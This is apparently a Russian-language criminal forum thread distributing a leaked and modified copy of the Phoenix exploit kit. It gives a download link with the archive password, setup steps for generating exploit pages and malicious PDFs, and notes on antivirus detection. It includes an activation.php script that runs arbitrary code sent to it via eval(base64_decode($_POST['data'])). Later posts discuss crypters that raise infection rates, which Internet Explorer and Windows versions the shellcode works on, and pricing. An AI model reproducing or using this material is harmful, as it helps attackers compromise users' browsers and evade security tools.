Phoenix Exp Pack 2.0

[Dragon_X]

Спойлер: 50

Восстановленный по слитым exp-ам
За базу брал версию 1.4, статистику оригинальную можете оттуда же взять.

el- в своём разборе выкладывал сплоиты именно 2.0fin, я слил с 2й beta, лоханулся))

По установке читайте Readme.txt

Вкратце:
- Редактируем configuration/config.php
- install.php
- recrypt.php => генерятся експлоиты в папке $TMPDIR="tmp" (правится в config.php)
- gen_pdf_all.php => tmp/all.pdf, если лениво возиться дальше, копируем его в collab.pdf, geticon.pdf, printf.pdf

От аверов не чистил, сплоиты/swf не палятся, pdf палится, java частично палится.

Спойлер: 300

http://www.sendspace.com/file/2sp20f

File: spl_expl.rar
Pass: hdflabntlwFDALJKIbopyb542gsa

 

[KodRed]

с отсюда взял ?
https://xss.pro/index.php?topic=1...ndpost&p=112964

 

[Dragon_X]

Ну да - основа эта же. Эту версию уже месяца 3 как выложили.

просто чуть изменил конфиг, слегка поменял админку по своему вкусу, изменил recrypt, cryptor, index.php
ну и сами сплоиты

 

[Dragon_X]

Спойлер: 30

Кстати, про активацию. В оригинальной версии автору предоставляется пароль от админки и по нему он генерирует файл activate.php. В версии что выкладывал это файл recrypt, без активации

activation.php

<?php
$PIN=SHA1($_POST['password']);
if ($PIN=="a12628aadfa2dadaf32a367abcca3434265dcd51255")
	{
  $IE=base64_decode($_POST['ie']);
  $XPIE7=base64_decode($_POST['xpie7']);
  $VISTAIE7=base64_decode($_POST['vistaie7']);
.........
  function WriteFile($path,$data)
  	{
    $file = $path;
    $fh = fopen($file, "w") or die("File ($file) does not exist!");
    fwrite($fh, $data);
    fclose($fh);
  	}
  WriteFile("tmp/ie.html",$IE);
  WriteFile("tmp/xpie7.html",$XPIE7);
  WriteFile("tmp/vistaie7.html",$VISTAIE7);
.........
  eval(base64_decode($_POST['data']));
  echo "Activation was completed succesfully!";
	}
else
	{
  echo "Activation Password Is Invalid. Activation Rejected!";
	}

?>

P.S. В оригинальный пак от феникса 2 входит ещё скрипт для проверки домена на вхождение в zeustracker.abuse.ch (удобно) + возможность загрузки файлов через админку.

 

[Dragon_X]

Спойлер: 10

-----------v2.1------------------------------------

[ + ]Сплойты PDF NEWPLAYER и PDF ALL совмещены в один файл что позволило снизить число фактов вылета браузера FireFox

[ + ]Новые крипторы с ускоренной распаковкой значительно повышают пробив

 

[KodRed]

так ты архив забыл выложить, или я что-то не догнал

 

[G100M]

обновление 100 баксов
засранцы они
за 2к берешь продукт и еще за обновления просят

 

[Mr.Di]

вот именно из-за этого я и перестал заниматься связками. потому что все хотят за 300 еще и получить пожизненный ФУД

 

[Dragon_X]

zombiexe
Слил в запакованном виде, надо ещё разбирать и восстанавливать до исходного вида

По тестам - оригинальный ш/к в фениксе срабатывает в IE 6/7/8, XP/Vista
Под 7ку не срабатывает

 

[Chococream]

Если шк всё тот же с ачата, то стукни под семёрку давно переписано

 

[Dragon_X]

да всё у меня есть.
я про оригинальный из феникса

 

[G100M]

за 300 е

за 2000, простите.